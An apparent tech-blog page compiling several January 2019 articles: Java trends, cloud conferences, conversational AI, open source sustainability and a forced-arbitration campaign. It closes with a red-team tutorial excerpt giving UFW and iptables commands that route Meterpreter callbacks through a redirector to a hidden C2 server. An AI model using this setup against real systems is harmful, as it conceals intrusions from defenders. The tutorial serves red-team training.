Prasad Ramesh
24 Jan 2019
7 min read

7 things Java programmers need to watch for in 2019

Java is one of the most popular and widely used programming languages in the world. Its dominance of the TIOBE index is largely unmatched: it has held the number one position for almost 20 years. Although Java's dominance is unlikely to waver over the next 12 months, there are many important issues and announcements that will demand the attention of Java developers. So, get ready for 2019 with this list of key things in the Java world to watch out for.

#1 Commercial Java SE users will now need a license

Perhaps the most important change for Java in 2019 is that commercial users will have to pay a license fee to use Java SE from February. This change comes as Oracle has decided to alter the support model for the language. It currently affects Java SE 8, an LTS release with premier support up to March 2022 and extended support up to March 2025. For individual users, however, support and updates will continue until December 2020. The recently released Java SE 11 will also have long-term support, with five years of premier support and eight years of extended support from the release date.

#2 The Java 12 release in March 2019

Since Oracle changed its support model, non-LTS versions will be released every six months and probably won't contain many major changes. JDK 12 is non-LTS, but that is not to say that the changes in it are trivial: it comes with its own set of new features. It will be generally available in March this year and supported until September, which is when Java 13 will be released. Java 12 will have a number of new features; some are approved to ship in its March release and some are still under discussion.

#3 Java 13 release slated for September 2019, with early access out now

So far, there is very little information about Java 13. All we really know at the moment is that it's due to be released in September 2019. Like Java 12, Java 13 will be a non-LTS release.
However, if you want an early insight, there is an early access build available to test right now. Some of the JEPs (JDK Enhancement Proposals) in the next section may be set to be featured in Java 13, but that's just speculation. https://twitter.com/OpenJDK/status/1082200155854639104

#4 A bunch of new features in Java in 2019

Even though Java 11, the major long-term support version, was released last year, this year's releases also have some noteworthy features in store. Let's take a look at what the two releases this year might have.

Confirmed candidates for Java 12:

A new low-pause-time garbage collector called Shenandoah, designed for modern computing resources, will cause minimal interruption while a program is running. Pause times will be consistent irrespective of heap size, which it achieves by performing collection work concurrently with the running program.

The Microbenchmark Suite will make it easier for developers to run existing benchmarks or create new ones.

Revamped switch statements should help simplify the process of writing code: the switch statement can also be used as an expression.

The JVM Constants API will, the OpenJDK website explains, "introduce a new API to model nominal descriptions of key class-file and run-time artifacts".

Java 12 integrates a single AArch64 port, instead of two.

Default CDS archives.

G1 mixed collections.

Other features that may not be out with Java 12:

Raw string literals will be added to Java.

A packaging tool, designed to make it easier to install and run a self-contained Java application on a native platform.

Limit Speculative Execution, to help both developers and operations engineers more effectively secure applications against speculative-execution vulnerabilities.

#5 More contributions and features with OpenJDK

OpenJDK is an open source implementation of Java Standard Edition (Java SE) which has contributions from both Oracle and the open-source community.
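To make the revamped switch concrete, here is a minimal sketch of a switch used as an expression. Note the hedges: the arrow form was a preview feature in JDK 12 (requiring the --enable-preview flag) and only became standard in later JDKs, and the `category` method is a hypothetical name invented for this illustration, not something from the JEP itself.

```java
public class SwitchDemo {
    // A switch used as an expression: each arrow label yields a value
    // directly, with no fall-through and no break statements.
    static String category(int dayOfWeek) {
        return switch (dayOfWeek) {
            case 6, 7 -> "weekend";          // multiple labels per case
            case 1, 2, 3, 4, 5 -> "weekday";
            default -> "invalid";            // an expression must cover all inputs
        };
    }

    public static void main(String[] args) {
        System.out.println(category(6)); // weekend
        System.out.println(category(3)); // weekday
    }
}
```

Because the switch yields a value, the compiler checks that every input is handled, removing a common source of fall-through bugs in classic switch statements.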
As of now, OpenJDK binaries are available for the newest LTS release, Java 11. The life cycles of OpenJDK 7 and 8 have also been extended, to June 2020 and June 2023 respectively. This suggests that Oracle is interested in the idea of open source and community participation. And why would it not be? Many valuable contributions come from the open source community; Microsoft, for example, seems to have benefited from the submissions that open sourcing brings in. Although Oracle will not support these versions beyond six months from their initial release, Red Hat will be extending support. As Mark Reinhold, chief architect of the Java platform, has said, stewards are the true leaders who can shape what Java should be as a language. These stewards can propose new JEPs, bring new OpenJDK problems to notice (leading to more JEPs), and contribute to the language overall.

#6 Mobile and machine learning job opportunities

In the mobile ecosystem, especially Android, Java is still the most widely used language. Yes, there's Kotlin, but it is still relatively new, and many developers are yet to adopt it. According to an estimate by Indeed, the average salary of a Java developer is about $100K in the U.S. With the Android ecosystem growing rapidly over the last decade, it's not hard to see what's driving Java's value. But Java, and the broader Java ecosystem, is about much more than mobile. Although Java's importance in enterprise application development is well known, it's also used in machine learning and artificial intelligence. Even if Python is arguably the most used language in this area, Java has its own set of libraries and is used widely in enterprise environments. Deeplearning4j, Neuroph, Weka, OpenNLP, RapidMiner, and RL4J are some of the popular Java libraries in artificial intelligence.
#7 Java conferences in 2019

Now that we've talked about the language, possible releases, and new features, let's take a look at the conferences taking place in 2019. Conferences are a good place to hear top professionals speak and for programmers to network. Even if you can't attend, they are important fixtures in the calendar for anyone interested in following releases and debates in Java. Here are some of the major Java conferences in 2019 worth checking out:

JAX is a Java architecture and software innovation conference, held in Mainz, Germany, May 6-10 this year, with the expo running from May 7 to 9. Beyond Java, topics like agile, cloud, Kubernetes, DevOps, microservices, and machine learning are also part of the event. Discounted passes are available until February 14.

JBCNConf is happening in Barcelona, Spain from May 27. It will be a three-day conference with talks from notable Java champions, focused on Java, the JVM, and open-source technologies.

Jfokus is a developer-centric conference taking place in Stockholm, Sweden. It will be a three-day event from February 4-6. Speakers include Brian Goetz, the Java language architect at Oracle, and many other notable experts. The conference will cover Java, of course, as well as frontend and web, cloud and DevOps, IoT and AI, and future trends.

JavaZone, one of the biggest conferences, attracting thousands of visitors and hundreds of speakers, will be 18 years old this year. It is usually held in Oslo, Norway in September. Its 2019 website is not active at the time of writing, but you can check out last year's website.

Javaland will feature lectures, training, and community activities. Held in Bruehl, Germany from March 19 to 21, attendees can also exhibit at this conference.

If you're working in or around Java this year, there's clearly a lot to look forward to, as well as a few unanswered questions about the evolution of the language in the future.
While these changes might not impact the way you work in the immediate term, keeping on top of what’s happening and what key figures are saying will set you up nicely for the future.

Sugandha Lahoti
23 Jan 2019
11 min read

The 10 best cloud and infrastructure conferences happening in 2019

The latest Gartner report suggests that the cloud market is going to grow an astonishing 17.3% (to $206 billion) in 2019, up from $175.8 billion in 2018. By 2022, the report claims, 90% of organizations will be using cloud services. But the cloud isn't one thing, and 2019 is likely to bring a diversity of solutions, from hybrid to multi-cloud to serverless, to the fore. With such a mix of opportunities and emerging trends, it's going to be essential to keep a close eye on key cloud computing and software infrastructure conferences throughout the year. These are the events where we'll hear the most important announcements, and they'll probably also be where the most important conversations happen. But with so many cloud computing conferences dotted throughout the year, it's hard to know where to focus your attention. For that very reason, we've put together a list of some of the best cloud computing conferences taking place in 2019.

#1 Google Cloud Next

When and where is Google Cloud Next 2019 happening? April 9-11 at the Moscone Center in San Francisco.

What is it? This is Google's annual global conference focusing on the company's cloud services and products, namely Google Cloud Platform. At previous events, Google has announced enterprise products such as G Suite and developer tools. The three-day conference features demonstrations, keynotes, announcements, conversations, and boot camps.

What's happening at Google Cloud Next 2019? This year Google Cloud Next has more than 450 sessions scheduled. You can also meet directly with Google experts in artificial intelligence and machine learning, security, and software infrastructure. Themes covered this year include application development, architecture, collaboration and productivity, compute, cost management, DevOps and SRE, hybrid cloud, and serverless. The conference may also serve as a debut platform for new Google Cloud CEO Thomas Kurian.

Who's it for?
This is a not-to-miss event for IT professionals and engineers, but it will also likely attract entrepreneurs. For those of us who won't attend, Google Cloud Next will certainly be one of the most important conferences to follow. Early bird registration begins March 1 at $999.

#2 OpenStack Infrastructure Summit

When and where is OpenStack Infrastructure Summit 2019 happening? April 29 - May 1 in Denver.

What is it? The OpenStack Infrastructure Summit, previously the OpenStack Summit, is focused on open infrastructure integration and has evolved over the years to cover more than 30 different open source projects. The event is structured around use cases, training, and related open source projects. The summit also hosts the Project Teams Gathering (PTG) just after the main conference (this year May 2-4). The PTG provides meeting facilities, allowing the various technical teams contributing to OpenStack Foundation (OSF) projects to meet in person, exchange ideas, and get work done in a productive setting.

What's happening at this year's OpenStack Infrastructure Summit? This year the summit is expected to have almost 300 sessions and workshops on container infrastructure, CI/CD, telecom and NFV, public cloud, private and hybrid cloud, security, and more. The summit will include members of open source communities like Airship, Ansible, Ceph, Docker, Kata Containers, Kubernetes, ONAP, OpenStack, Open vSwitch, OPNFV, StarlingX, and Zuul, among others.

Who's it for? This is an event for engineers working in operations and administration. If you're interested in OpenStack and how the foundation fits into the modern cloud landscape, there will certainly be something here for you.

#3 DockerCon

When and where is DockerCon 2019 happening? April 29 to May 2 at Moscone West, San Francisco.

What is it? DockerCon is perhaps the container event of the year.
The focus is on what's happening across the Docker world, but it will offer plenty of opportunities to explore the ways Docker is interacting and evolving with a wider ecosystem of tools.

What's happening at DockerCon 2019? This three-day conference will feature networking opportunities and hands-on labs. It will also hold an exposition where innovators showcase their latest products. It's expected to have over 6,000 attendees with 5+ tracks and 100 sessions. You'll also have the opportunity to become a Docker Certified Associate with an on-venue test.

Who's it for? The event is essential for anyone working in and around containers: DevOps, SRE, administration, and infrastructure engineers. Of course, with Docker finding its way into the toolsets of a variety of roles, it may be useful for people who want to understand how Docker might change the way they work in the future. Pricing for DockerCon runs from around $1,080 for early-bird reservations to $1,350 for standard tickets.

#4 Red Hat Summit

When and where is Red Hat Summit 2019 happening? May 7-9 in Boston.

What is it? Red Hat Summit is an open source technology event run by Red Hat. It covers a wide range of topics and issues, essentially providing a snapshot of where the open source world is at the moment and where it might be going. With open source shaping cloud and related trends, it's easy to see why the event could be important for anyone with an interest in cloud and infrastructure.

What's happening at Red Hat Summit 2019? The theme for this year is AND. The copy on the event's website reads: "AND is about scaling your technology and culture in whatever size or direction you need, when you need to, with what you actually need―not a bunch of bulky add-ons. From the right foundation―an open foundation―AND adapts with you. It's interoperable, adjustable, elastic. Think Linux AND Containers. Think public AND private cloud. Think Red Hat AND you."
There's clearly an interesting conceptual proposition at the center of this year's event that hints at how Red Hat wants engineers and technology buyers to think about the tools they use and how they use them.

Who's it for? The event is big for any admin or engineer who works with open source technology, Linux in particular (so, quite a lot of people...). Given that IBM's acquisition of Red Hat was announced just a few months ago, in late 2018, this event will certainly be worth watching for anyone interested in the evolution of both companies as well as open source software more broadly.

#5 KubeCon + CloudNativeCon Europe

When and where is KubeCon + CloudNativeCon Europe 2019? May 20 to 23 at Fira Barcelona.

What is it? KubeCon + CloudNativeCon is the CNCF's (Cloud Native Computing Foundation) flagship conference for open source and cloud-native communities. It features contributors from cloud-native applications and computing, containers, microservices, orchestration, and related projects, furthering education in the technologies that support the cloud-native ecosystem.

What's happening at this year's KubeCon? The conference will feature a range of events and sessions from industry experts, project leaders, and sponsors. The details of the conference are still in development, but the focus will be on projects such as Kubernetes (obviously), Prometheus, Linkerd, and CoreDNS.

Who's it for? The conference is relevant to anyone with an interest in software infrastructure. It's likely to be instructive and insightful for those working in SRE, DevOps, and administration, but because of Kubernetes' importance in cloud-native practices, there will be something here for many others in the technology industry. The cost is unconfirmed, but expect it to be anywhere between $150 and $1,100.

#6 IEEE International Conference on Cloud Computing

When and where is the IEEE International Conference on Cloud Computing? July 8-13 in Milan.

What is it?
This is an IEEE conference solely dedicated to cloud computing. IEEE Cloud is essentially a venue for research practitioners to exchange their findings on the latest cloud computing advances. It includes findings across all "as a service" categories, including network, infrastructure, platform, software, and function.

What's happening at the IEEE International Conference on Cloud Computing? IEEE Cloud 2019 invites original research papers addressing all aspects of cloud computing technology, systems, applications, and business innovations. These are mostly technical topics including cloud as a service, cloud applications, cloud infrastructure, cloud computing architectures, cloud management, and operations. Shangguang Wang and Stephan Reiff-Marganiec have been appointed as congress workshop chairs. Featured keynote speakers for the 2019 World Congress on Services include Kathryn Guarini, VP at IBM Industry Research, and Joseph Sifakis, Emeritus Senior CNRS Researcher at Verimag.

Who's it for? The conference has a more academic bent than the others on this list. That means it's particularly important for researchers in the field, but there will undoubtedly be plenty here for industry practitioners who want new perspectives on the relationship between cloud computing and business.

#7 VMworld

When and where is VMworld 2019? August 25-29 in San Francisco.

What is it? VMworld is a virtualization and cloud computing conference hosted by VMware. It is the largest virtualization-specific event. VMware CEO Pat Gelsinger and the executive team typically provide updates on the company's various business strategies, including multi-cloud management, VMware Cloud on AWS, end-user productivity, security, mobile, and other efforts.

What's happening at VMworld 2019? The five-day conference starts with general sessions on IT and business. It then goes deeper into breakout sessions, expert panels, and quick talks.
It also offers various VMware Hands-on Labs and VMware certification opportunities, as well as one-on-one appointments with in-house experts. More than 21,000 attendees are expected.

Who's it for? VMworld maybe doesn't have the glitz and glamor of an event like DockerCon or KubeCon, but for administrators and technology decision makers with an interest in VMware's products and services, it's an essential date in the calendar.

#8 Microsoft Ignite

When and where is Microsoft Ignite 2019? November 4-8 in Orlando, Florida.

What is it? Ignite is Microsoft's flagship enterprise event for everything cloud, data, business intelligence, teamwork, and productivity.

What's happening at Microsoft Ignite 2019? Microsoft Ignite 2019 is expected to feature almost 700 deep-dive sessions and more than 100 expert-led and self-paced workshops. The full agenda will be posted sometime in spring 2019, and pre-registration for Ignite 2019 is already open. Microsoft will also be touring many cities around the world to bring the Ignite experience to more people.

Who's it for? The event should have wide appeal, and will likely reflect Microsoft's efforts to bring a range of tech professionals into its ecosystem. Whether you're a developer, infrastructure engineer, or operations manager, Ignite is, at the very least, an event you should pay attention to.

#9 Dreamforce

When and where is Dreamforce 2019? November 19-22 in San Francisco.

What is it? Dreamforce, hosted by Salesforce, is a truly huge conference, attended by more than 100,000 people. Focusing on Salesforce and CRM, the event is an opportunity to learn from experts, share experiences and ideas, and stay up to speed with trends in the field, like automation and artificial intelligence.

What's happening at Dreamforce 2019? Dreamforce features over 25 keynotes, a vast range of breakout sessions (almost 2,700), and plenty of opportunities for networking. The conference is so extensive that it has its own app to help delegates manage their agendas and navigate venues.

Who's it for?
Dreamforce is primarily about Salesforce, so it's very much an event for customers and users. But given the size of the event, it also offers a great deal of insight into how businesses are using SaaS products and what they expect from them. This means there is plenty for those working in more technical or product roles to learn at the event.

#10 Amazon re:Invent

When and where is Amazon re:Invent 2019? December 2-6 at The Venetian, Las Vegas, USA.

What is it? Amazon re:Invent is hosted by AWS, which, if you've been living on Mars in recent years, is the market leader when it comes to cloud. The event, then, is AWS' opportunity to set the agenda for the cloud landscape, announcing updates and new features, as well as an opportunity to discuss the future of the platform.

What's happening at Amazon re:Invent 2019? Around 40,000 people typically attend Amazon's top cloud event. Amazon Web Services and its cloud-focused partners typically reveal product releases on several fronts, including enterprise security, the Transit Virtual Private Cloud service, and general releases. This year, Amazon is also launching a related conference dedicated exclusively to cloud security, called re:Inforce. The inaugural event will take place June 25-26, 2019 at the Boston Convention and Exhibition Center.

Who's it for? The conference attracts Amazon's top customers, software distribution partners (ISVs), and public cloud MSPs. The event is essential for developers, engineers, administrators, architects, and decision makers. Given the importance of AWS in the broader technology ecosystem, this is an event that will be well worth tracking, wherever you are in the world.

Did we miss an important cloud computing conference? Are you attending any of these this year? Let us know in the comments; we'd love to hear from you. Also, check this space for more detailed coverage of the conferences.

Bhagyashree R
21 Jan 2019
5 min read

Conversational AI in 2018: An arms race of new products, acquisitions, and more

Conversational AI is one of the most interesting applications of artificial intelligence in recent years. While the trend isn't yet ubiquitous in the way that recommendation systems are (perhaps unsurprisingly), it has been successfully productized by a number of tech giants in the form of Google Home and Amazon Echo (which is 'powered by' Alexa).

The conversational AI arms race

Arguably, 2018 saw a bit of an arms race in conversational AI. As well as Google and Amazon, the likes of IBM, Microsoft, and Apple have wanted a piece of the action. Here are some of the new conversational AI tools and products these companies introduced this year:

Google

Google worked on enhancing its conversational interface development platform, Dialogflow. In July, at the Google Cloud Next event, it announced several improvements and new capabilities for Dialogflow, including text to speech via DeepMind's WaveNet and the Dialogflow Phone Gateway for telephony integration. It also launched a new product called Contact Center AI, which comes with Dialogflow Enterprise Edition and additional capabilities to assist live agents and perform analytics. Google Assistant became better at holding a back-and-forth conversation with the help of Continued Conversation, which was unveiled at the Google I/O conference. The Assistant became multilingual in August, meaning users can speak to it in more than one language at a time without having to adjust their language settings; users enable this functionality by selecting two of the supported languages. Following in the footsteps of Amazon, Google also launched its own smart display, the Google Home Hub, at the 'Made by Google' event held in October.

Microsoft

Microsoft in 2018 introduced and improved various bot-building tools for developers. In May, at the Build conference, Microsoft announced major updates to its conversational AI tools: Azure Bot Service, Microsoft Cognitive Services Language Understanding, and QnAMaker.
To enable intelligent bots to learn from example interactions and handle common small talk, it launched new experimental projects named Conversation Learner and Personality Chat. At Microsoft Ignite, Bot Framework SDK V4.0 was made generally available, and later, in November, Microsoft announced the general availability of the Bot Framework Emulator V4 and the Web Chat control. In May, to drive more research and development in its conversational AI products, Microsoft acquired Semantic Machines and established a conversational AI center of excellence in Berkeley. In November, the organization's acquisition of Austin-based bot startup XOXCO was a clear indication that it wants to get serious about using artificial intelligence for conversational bots. Producing guidelines on developing 'responsible' conversational AI further confirmed Microsoft wants to play a big part in the future evolution of the area. Microsoft was also chosen as the technology partner of UK-based conversational AI startup ICS.ai, whose team is using Microsoft's Azure and LUIS in its public sector AI chatbots, aimed at higher education, healthcare trusts, and county councils.

Amazon

Amazon, with the aim of improving Alexa's capabilities, released the Alexa Skills Kit (ASK), which consists of APIs, tools, documentation, and code samples developers can use to build new skills for Alexa. In September, it announced a preview of a new design language named Alexa Presentation Language (APL). With APL, developers can build visual skills that include graphics, images, slideshows, and video, and customize them for different device types. Amazon's smart speaker, the Echo Dot, saw amazing success, becoming the best seller in the smart speaker category on Amazon. At its 2018 hardware event in Seattle, Amazon announced a redesigned Echo Dot and a new addition to its Alexa-powered A/V lineup called Echo Plus.
As well as the continuing success of Alexa and the Amazon Echo, Amazon's decision to launch the Alexa Fellowship at a number of leading academic institutions highlights that, for the biggest companies, conversational AI is as much about research and exploration as it is about products. Like Microsoft, Amazon appears well aware that conversational AI is an area still in its infancy: as much as great products, it requires clear thinking and cutting-edge insight to ensure that it develops in a way that is both safe and impactful.

What's next?

This huge array of products is the result of advances in deep learning research. Conversational AI is no longer limited to small tasks like setting an alarm or searching for the best restaurant; we can now have a back-and-forth conversation with a conversational agent. But, needless to say, it still needs more work. Conversational agents are yet to meet user expectations around sensing and responding with emotion. In the coming years, we will see these systems understand and do a better job at generating natural language. They will be able to have reasonably natural conversations with humans in certain domains, grounded in context. The continuous development of IoT will also provide AI systems with more context.

Sugandha Lahoti
18 Jan 2019
4 min read

GitHub wants to improve open source sustainability; invites maintainers to talk about their OSS challenges

Open source sustainability is an essential and special part of free and open software development. Open source contributors and maintainers build tools and technologies for everyone, but they don't get enough resources, tools, or support. If anything goes wrong with a project, it is generally the contributors who are held responsible for it. In reality, however, contributors and maintainers are equally responsible. Yesterday, Devon Zuegel, the open source product manager at GitHub, penned a blog post about open source sustainability and the issues open source maintainers face while trying to contribute to open source.

The biggest thing holding back OSS is the work overload that maintainers face. The open source community generally consists of maintainers who work at other organizations while maintaining open source projects, mostly in their free time. This leaves little room for software creators to gain economically from their projects or to cover the costs and people required to maintain them. This calls for companies and individuals to donate to these maintainers on GitHub. As one Hacker News user points out, “I think this would be a huge incentive for people to continue their work long-term and not just 'hand over' repositories to people with ulterior motives.” Another said, “Integrating bug bounties and donations into GitHub could be one of the best things to happen to Open Source. Funding new features and bug fixes could become seamless, and it would sway more devs to adopt this model for their projects.”

Another major challenge is the abuse and frustration that maintainers have to face on a daily basis. As Devon writes in her blog post, “No one deserves abuse.
OSS contributors are often on the receiving end of harassment, demands, and general disrespect, even as they volunteer their time to the community.” What is needed is to educate people and to build some kind of moderation for trolls, such as a small barrier to entry. Beyond that, maintainers should be given expanded visibility into how their software is used; currently, they only get access to download statistics. There should also be a proper governance model that is regularly updated based on the decisions a team makes, delegates, and communicates.

As Adam Jacob, founder of SFOSC (Sustainable Free and Open Source Communities), points out, “I believe we need to start talking about Open Source, not in terms of licensing models, or business models (though those things matter): instead, we should be talking about whether or not we are building sustainable communities. What brings us together, as people, in this common effort around the software? What rights do we hold true for each other? What rights are we willing to trade in order to see more of the software in the world, through the investment of capital?”

SFOSC was established to discuss the principles that lead to sustainable communities, to develop clear social contracts communities can use, and to educate open source companies on which business models can create true communities. Like SFOSC, GitHub wants to better understand the woes of maintainers from their own experiences, hence the blog post. Devon wants to support the people behind OSS at GitHub, inviting people to have an open dialogue with the GitHub community to solve the nuanced and unique challenges the current OSS community faces. She has created a contact form asking open source contributors and maintainers to join the conversation and share their problems.
We need to encourage the meta-conversation around open source, says Nadia Eghbal [Interview] EU to sponsor bug bounty programs for 14 open source projects from January 2019

Natasha Mathur
17 Jan 2019
6 min read

Googlers launch industry-wide awareness campaign to fight against forced arbitration

A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called 'Googlers for Ending Forced Arbitration', shared information about arbitration on its Twitter and Instagram accounts throughout the day. https://twitter.com/endforcedarb/status/1084813222505410560

As part of the campaign, the group tweeted that in surveying employees of 30+ tech companies and 10+ common temp/contractor suppliers in the industry, none of the companies could meet the three primary criteria needed for a transparent workplace. The three basic criteria are: an optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration proceedings confidential. The group shared some hard facts about arbitration and also busted myths regarding the practice. Let's have a look at some of the key highlights from yesterday's campaign.

At least 60 million Americans are forced to use arbitration

The group states that the implementation of forced arbitration policies has grown significantly in the past seven years. Over 65% of companies with 1,000 or more employees now have mandatory arbitration procedures. Employees don't have the option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones affected the most by this practice.           How employers use forced arbitration

Forced arbitration is extremely unfair

Arbitration firms that are hired by the companies usually favour the companies over their employees. This is due to the fear of being rejected the next time by an employer should the arbitration firm decide to favour the employee. The group states that employees are 1.7 times more likely to win in federal courts and 2.6 times more likely to win in state courts than in arbitration.
There are no public filings of the complaint details, meaning that the company won't have anyone to answer to regarding the issues within the organization. The company can also limit its obligation when it comes to disclosing the evidence that you need to prove your case.

Arbitration hearings happen behind closed doors within a company

An arbitration hearing involves just an employee and their lawyer, the other party and their lawyer, along with a panel of one to three arbitrators. Each party gets to pick one arbitrator, though the arbitrators are ultimately hired by the employer. However, there is usually only a single-arbitrator panel involved, as a three-arbitrator panel costs five times more than a single arbitrator, as per the American Arbitration Association.

Forced arbitration requires employees to sign away their right to class action lawsuits at the start of their employment

The group states that irrespective of whether there are legal disputes, forced arbitration bans employees from coming together as a group in arbitration as well as in class action lawsuits. Most employers also practice a "gag rule", which restricts employees from even talking about their experience with the arbitration policy. There are certain companies that do give you an option to opt out of forced arbitration using an opt-out form, but this comes with a time constraint depending on your agreement with that company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration.                                                 Arbitration opt-out option

JAMS and AAA are among the top arbitration organizations used by major tech giants

JAMS, Judicial Arbitration and Mediation Services, is a private company that is used by employers like Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators.
Similarly, the AAA, the American Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in the AAA have an overall composition of 24% women and minorities. The AAA is one of the largest arbitration organizations and is used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma.

Katherine Stone, a professor at the UCLA law school, states that the procedures followed by these arbitration firms don't allow much discovery. What this means is that these firms don't usually permit depositions or various kinds of document exchange before the hearing. "So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can't learn about the experience of others," says Stone.

Female workers and African-American workers are the most likely to suffer from forced arbitration

58% of female workers and 59% of African-American workers face mandatory arbitration, depending on the workgroup. For instance, in the construction industry, which is highly male-dominated, forced arbitration is imposed at the lowest rate. But in the education and health industries, which have a largely female workforce, the imposition rate of forced arbitration is high.                                Forced arbitration rate among different workgroups

The Supreme Court has gradually allowed companies to expand arbitration to employees and consumers

The group states that the 1925 Federal Arbitration Act (FAA) legalized arbitration between shipping companies for settling commercial disputes. The Supreme Court, however, has since expanded this practice of arbitration to employment and consumer contracts too.                                                  Supreme Court decisions

Apart from sharing these facts, the group also shed insight on the dos and don'ts that employees should follow under forced arbitration clauses.
                        Dos and Don'ts

The social media campaign by Googlers against forced arbitration represents an upsurge in strength and courage among employees within the tech industry, as not just Google employees but also employees from other tech companies shared their experiences regarding forced arbitration. As part of the campaign, the group researched academic institutions, labour attorneys, advocacy groups, and the contracts of around 30 major tech companies. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account.

Shareholders sue Alphabet's board members for protecting senior execs accused of sexual harassment Recode Decode #GoogleWalkout interview shows why data and evidence don't always lead to right decisions in even the world's most data-driven company Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley

Amrata Joshi
16 Jan 2019
11 min read

Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

A redirector server is responsible for redirecting all communication to the C2 server. Let's explore the basics of redirectors using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload has been delivered to the target and executed successfully.

This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting, and much more.

Here's what will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2's IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation, displayed in an architectural format to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of it. Refer to the following image for a clear understanding of this process: This is the current IP information of our redirector and C2:

Redirector IP: 35.153.183.204
C2 IP: 54.166.109.171

Assuming that socat is installed on the redirector server, we will execute the following command to forward all the communications on the incoming port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change.
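The socat forward itself appears in the book as a screenshot, so here is a hedged sketch of what it would look like (the exact options are an assumption on my part):

```shell
#!/bin/sh
# Values from the example setup in the article
C2_IP=54.166.109.171
PORT=8080

# Build the forwarding command: listen on 8080/tcp and relay every
# connection to the C2. 'fork' spawns a child per connection so multiple
# targets can connect at once. The command is printed rather than
# executed, since it needs root and a live redirector host.
CMD="socat TCP4-LISTEN:${PORT},fork,reuseaddr TCP4:${C2_IP}:${PORT}"
echo "sudo ${CMD}"
```

On the live redirector, the printed command would be run directly (with sudo) and left in the foreground or backgrounded with a process supervisor.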
This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We might now notice something different about the following image, as the source IP is the redirector's instead of the target server's: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP, and neither does the Blue team.

Now that the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in a way that protects it from outside reconnaissance (recon) and attacks.

Obfuscating C2 securely

To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that it is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2.
To begin, execute the following UFW commands to add firewall rules for the C2:

sudo ufw allow 22
sudo ufw allow 55553
sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp
sudo ufw allow out to 35.153.183.204 port 8080 proto tcp
sudo ufw deny out to any

The given commands need to be executed and the result is shown in the following screenshot: In addition, execute the following ufw commands to add firewall rules for the redirector as well:

sudo ufw allow 22
sudo ufw allow 8080

The given commands need to be executed and the result is shown in the following screenshot: Once the ruleset is in place, this can be described as follows: If we try to perform a port scan on the C2 now, the ports will be shown as filtered, as shown below. Furthermore, our C2 is only accessible from our redirector now. Let's also confirm this by doing a port scan on our C2 from the redirector server:

Short-term and long-term redirectors

Short-term (ST)—also called short-haul—C2 servers are those on which the beaconing process continues. Whenever a system in the targeted organization executes our payload, it will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This is responsible for handling ST-C2 server connections, through which the ST-C2 will be used for executing commands on the target server in real time. ST and LT redirectors can get caught easily during the course of an engagement because they're placed at the front.

A long-term (LT)—also known as long-haul—C2 server is one where the callbacks received from the target server arrive only every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors.
When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector. A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png

Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors.

Redirection methods

There are two ways in which we can perform redirection:

Dumb pipe redirection
Filtration/smart redirection

Dumb pipe redirection

Dumb pipe redirectors blindly forward the network traffic from the target server to our C2, or vice versa. This type of redirector is useful for quick configuration and setup, but it lacks any level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but it won't distract the defenders of the organization from investigating our setup. We can perform dumb pipe redirection using socat or iptables. In both cases, the network traffic will be redirected either to our ST-C2 server or our LT-C2 server. Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png

Let's execute the command given in the following image in order to configure a dumb pipe redirector which redirects to our C2 on port 8080/tcp: The following are the commands that we can execute to perform dumb pipe redirection using iptables:

iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

